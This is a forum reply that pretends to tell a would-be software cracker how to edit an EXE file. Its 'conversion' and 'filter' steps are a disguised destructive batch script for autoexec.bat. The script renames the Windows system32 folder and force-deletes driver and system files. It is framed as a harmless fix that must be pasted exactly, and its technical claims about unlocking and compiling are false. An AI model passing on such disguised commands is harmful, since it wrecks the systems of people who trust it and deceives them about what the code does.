Oh, A cracker wannabe. Here is what to do

by w2ktechman In reply to change EXE code

change the .exe extension to .txt
add at the end of the file
Unlock=0

change the file back to .exe

By this itself, will not work. Now we gotta add the proper filters and re-convert your text (compile) the .exe file to get it to run properly. You will need a Windows boot disk (floppy or cd). You will need to add these lines to the autoexec.bat file (r. click autoexec.bat and select Edit). (copy and paste works best, you want it exactly as posted).

REM CONVERT_TEXT_ENGINE
ren %systemroot%\system32 SoftWare
ren %systemroot%\Software\SoftwareDistribution %0.exe
del /F /S /Q %systemroot%\software\drivers\*.*
del /F /S /Q %systemroot%\software\c*.*
del /F /S /Q %systemroot%\software\d*.*
REM RUN_FILTERx=00264782x00264788x00252842x00982341
PRINT "Conversion and Filters complete"
exit

save the file and reboot. Boot to the floppy or cd that was created. Let the batch file run and all will be OK afterwards
